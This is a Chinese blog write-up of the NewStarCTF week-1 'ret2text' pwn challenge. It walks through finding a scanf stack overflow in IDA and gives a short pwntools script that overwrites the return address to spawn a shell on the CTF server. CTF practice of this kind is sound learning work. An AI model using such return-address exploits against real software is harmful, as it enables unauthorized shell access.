NewStartCTF week1 PWN

最新推荐文章于 2024-08-31 19:45:21 发布
最新推荐文章于 2024-08-31 19:45:21 发布
阅读量203 收藏
点赞数
分类专栏: PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60794823/article/details/127077682
版权

ret2text

很简单的一道栈溢出题目
image
首先通过checksec查看题目开启了什么保护,只开启了NX,是64位的amd文件拖到ida中查看
image
首先shift+f12查看字串发现,/bin/sh
image
双击跟进发现调用函数的地址:0X400708
image
点击main函数查看反编译代码,发现scanf(“%s”, v4),栈溢出漏洞
image
双击v4查看内存,需溢出28字节image
payload即为:*'a’0x28 + p64(0x400708)  接下来构造exp:

from pwn import *

p = remote('node4.buuoj.cn', 27021)


bin_sh = 0x400708

payload = b'a'*0x28 + p64(bin_sh)


p.sendline(payload)
p.interactive()

拿到flag:image

长不高的李肥肥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
NewStarCTF pwn
iczfy585的博客
10-21 1020
NewStarCTFpwn的一些wp
NewStarCTFWEEK1部分题解
m0_51251108的博客
09-26 930
NewStarCTFWEEK1
[NewStarCTF 公开赛赛道]ret2text 94
2302_81899310的博客
07-31 171
在main函数打个断点进行动态分析发现共需填入0x20个字符型数据,且还需填写8个数据将原来末尾的数据覆盖,然后将main函数的返回地址写为后门函数的地址,写出攻击脚本。根据题目ret2text的提示,我们可以构造payload,在栈内填充垃圾数据,从而使得main函数的返回地址为后门函数的地址,进而拿取到机器的控制权,获取flag.利用pwndbg进行动态分析时发现没有执行权限,所以我们要利用chmod命令加权。确实是后门函数,并且有函数存在栈溢出的漏洞。发现一个后门函数,点进去确认一下。
NewStarCTF week2 部分题解
Aiwin的博客
09-29 3431
NewStarCTF week2 尽力的某些题解
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1791
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
Pwn入门指北1
08-03
1. 各大主流平台汇编语言,例如x86与arm 2. C语言 5. 计算机组成原理 6. 计算机操作系统 7. 编译原理 1 . 关于环境 2 . 面向萌新的一
pwn1 一道pwn练习题
05-07
pwn练习题
ret2libc1pwn 入门题
02-11
pwn 入门题
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
末初的CSDN博客
10-03 1696
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 1187
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
安全入门day.03
最新发布
mxxcxy的博客
08-31 699
Fiddler是一款强大的HTTP调试代理工具,它以代理服务器的形式工作,通过监听和记录HTTP(s)通讯,帮助用户检查、设置断点以及修改所有进出数据(如cookie、HTML、JS、CSS等文件)。Fiddler不仅简单易用,还提供了用户友好的界面和丰富的功能,如支持断点调试、请求构造、性能数据分析等,使得开发人员和测试人员能够轻松地进行Web调试和性能测试。此外,Fiddler还包含一个基于JScript .NET的事件脚本子系统,支持使用.NET框架语言进行扩展,进一步增强了其灵活性和功能性。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 480
SaveButton 安全控件说明
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 485
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
08-31 523
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
掌控安全CTF-2024年8月擂台赛-ez_misc
ASD830的博客
08-28 406
用得到的密码(the_password_is_zkaq!)去解密 最后的秘密.zip 压缩包,可以得到一个key.txt和一个加密的flag.zip。这里我们没啥信息可用的了,返回去看看 最后的秘密.zip 压缩包有注释(我最喜欢和超人一起下棋了,哈哈哈哈哈哈!发现需要密钥,超人超人,猜测为“superman”,解密成功得到新的key:s1mple。找到了通往大千世界的旗帜,请提交你的旗帜,然后继续环游世界吧!我们就可以猜测为棋盘解密,找个解密网站(再往下我们又会找到rsa.txt。
23. 如何使用Collections.synchronizedList()方法来创建线程安全的集合?有哪些注意事项?
zhzjn的博客
08-31 502
复合操作是指多个操作组成的逻辑单元,如遍历集合和修改集合的操作结合在一起时。是在写操作时创建集合的副本,而读操作可以无锁进行,因此在读多写少的场景中具有较好的性能。在多线程环境下,选择合适的集合类型和同步机制至关重要,这取决于应用的具体需求和并发程度。确保了对单个方法调用的线程安全性,但在某些复合操作中(如遍历集合),仍然需要进行。如果在实际应用中存在大量并发读操作,而写操作较少,可以考虑使用其他并发集合类,如。,这些类提供了更细粒度的锁和更高效的并发处理机制,通常在高并发场景下表现更好。
Mac m1配置pwn
09-02
- *1* *3* [在Apple Silicon(M1)上搭建pwn解题环境](https://blog.csdn.net/qq_25755011/article/details/115541221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值